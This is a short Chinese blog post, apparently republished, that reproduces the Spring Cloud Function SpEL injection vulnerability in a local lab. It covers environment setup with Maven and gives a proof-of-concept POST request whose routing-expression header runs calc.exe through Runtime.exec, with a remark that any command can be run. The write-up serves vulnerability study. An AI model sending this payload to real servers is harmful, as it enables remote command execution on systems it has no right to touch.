Spring-Cloud-Function-Spel 漏洞复现

Posted 一粒砂子

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Spring-Cloud-Function-Spel 漏洞复现相关的知识,希望对你有一定的参考价值。

Spring-Cloud-Function-Spel 漏洞复现

1、漏洞环境搭建

  由于漏洞出现在前两天,原本等待vulhub出环境,直接docker 一键就ok了。但是这次vulhub好像不太及时。对于自己只能自己搭建环境了。

       找了许久,终于在唐大佬的github中找到几乎一键的方法。

  参考链接:https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel  这里放原始链接以表示尊重。

  无法上github的话,私信我。

  搭建方法很简单,先安装maven  jdk 等。大佬是jdk17  我本地下载最新版本18 也是ok

  

 

     方法如下:下载代码后,在解压目录cmd执行 mvn spring-boot:run  会下载很多库,需要耐心等待。成功后会开启8080 端口。

  

 

 

   漏洞poc极其简单:

  路径最好使用funtionRouter,原因自查。此环境倒是任意路径都ok。

  

POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
可以执行任意命令,检测的话可以使用dnslog方法。直接ping dnslog平台。

 

  漏洞验证:

 

以上是关于Spring-Cloud-Function-Spel 漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章